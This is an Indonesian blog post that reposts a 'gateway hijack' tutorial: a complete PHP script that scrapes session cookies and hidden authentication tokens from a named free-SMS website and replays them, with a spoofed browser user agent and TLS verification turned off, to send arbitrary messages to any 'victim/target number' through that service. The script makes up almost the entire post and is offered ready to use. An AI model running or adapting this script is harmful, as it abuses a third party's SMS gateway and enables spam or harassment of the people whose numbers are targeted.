[TUTS] SMS Gratis ke Indonesia Gateway Hijack

[TUTS] SMS Gratis ke Indonesia Gateway Hijack - Halo sobat Blog Download Source Code Terlengkap Gratis, Pada kesempatan kali ini, saya akan membahas artikel tentang [TUTS] SMS Gratis ke Indonesia Gateway Hijack Artikel Tips & How, Artikel Tutorial, Semoga artikel yang saya buat bermanfaat. Selamat membaca!.

Judul : [TUTS] SMS Gratis ke Indonesia Gateway Hijack
link : [TUTS] SMS Gratis ke Indonesia Gateway Hijack

Baca juga


[TUTS] SMS Gratis ke Indonesia Gateway Hijack

DewaPentol -  SMS Gratis Ke Indonesia Gateway Hijack

My gateway server of victim is; smsgratis2indonesia{dot}co{dot}id

Let see how it's works!

SMS Gratis ke Indonesia Gateway Hijack Preview
(SMS Gratis ke Indonesia Gateway Hijack 1.0)


# usage; http://localhost/this.php?no={victim/target number}&text={your text}


DATA HOSTED WITH ♥ BY PASTEBIN.COM - DOWNLOAD RAW - SEE ORIGINAL
  1. <?php
  2. define("HOST", "http://www.smsgratis2indonesia.co.id");
  3.     /**
  4.         me@dwisiswanto.my.id
  5.         --
  6.         usage; http://localhost/this.php?no={victim number}&text={your text}
  7.     **/
  8. $num = @$_GET['no'];
  9. $psn = @$_GET['text'];
  10. if (isset($num) && isset($psn)) {
  11.     $attrib = ambil();
  12.     if ($attrib != null) {
  13.         $exec = kirim($num, $psn, $attrib);
  14.         if (preg_match("/has been sent/i", $exec)) {
  15.             // true
  16.             echo "Success";
  17.         } else {
  18.             // false, you can see what kind of error by $exec[0]
  19.             echo "Fail";
  20.         }
  21.     }
  22. } else {
  23.     echo "`no` and `text` parameter can't be empty";
  24. }
  25. function hajar($yuerel, $dataAing = null, $head = null) {
  26.     $cuih = curl_init();
  27.     curl_setopt($cuih, CURLOPT_URL, $yuerel);
  28.     if ($dataAing != null){
  29.         curl_setopt($cuih, CURLOPT_POST, true);
  30.         curl_setopt($cuih, CURLOPT_POSTFIELDS, $dataAing);
  31.     }
  32.     curl_setopt($cuih, CURLOPT_FOLLOWLOCATION, true);
  33.     curl_setopt($cuih, CURLOPT_RETURNTRANSFER, true);
  34.     curl_setopt($cuih, CURLOPT_SSL_VERIFYPEER, false);
  35.     curl_setopt($cuih, CURLOPT_COOKIESESSION, true);
  36.     curl_setopt($cuih, CURLOPT_HEADER, true);
  37.     if ($head != null) {
  38.         curl_setopt($cuih, CURLOPT_HTTPHEADER, $head);
  39.     }
  40.     curl_setopt($cuih, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1");
  41.     $eks = curl_exec($cuih);
  42.     curl_close($cuih);
  43.     return array($eks, explode("\n", $eks));
  44. }
  45. function ambil() {
  46.     $get = hajar(HOST)[0];
  47.     preg_match_all("/Set-Cookie: (.*?);|input type=\"hidden\" name=\"(.*?)\"value=\"(.*?)\"|input type=hidden name='(.*?)' value='(.*?)'/s", $get, $attrib);
  48.     if (isset($attrib)) {
  49.         return $attrib;
  50.     }
  51. }
  52. function kirim($num, $psn, $attrib) {
  53.     $data = array("T1" => $attrib[3][1], "tgl" => $attrib[5][2], "auth" =>$attrib[5][3], "ip" => $attrib[5][4], "noHP" => $num, "pesan" => $psn, "TOMBOL"=> "KIRIM+SMS");
  54.     $exec = hajar(HOST . "/kirimkan-sms", $data, array("Cookie: " . $attrib[1][0], "Referer: " . HOST));
  55.     return $exec[0];
  56. }
  57. ?>

Sekian dari saya Terimakasih, Share and Enjoy!
Sumber : KawanBlogger - DewaPentol


Demikianlah Artikel [TUTS] SMS Gratis ke Indonesia Gateway Hijack

Sekianlah artikel [TUTS] SMS Gratis ke Indonesia Gateway Hijack kali ini, mudah-mudahan bisa memberikan manfaat untuk anda semua. baiklah, sampai jumpa di postingan artikel berikutnya.

Anda sekarang membaca artikel [TUTS] SMS Gratis ke Indonesia Gateway Hijack dengan alamat link http://lapak-code.blogspot.com/2016/10/tuts-sms-gratis-ke-indonesia-gateway.html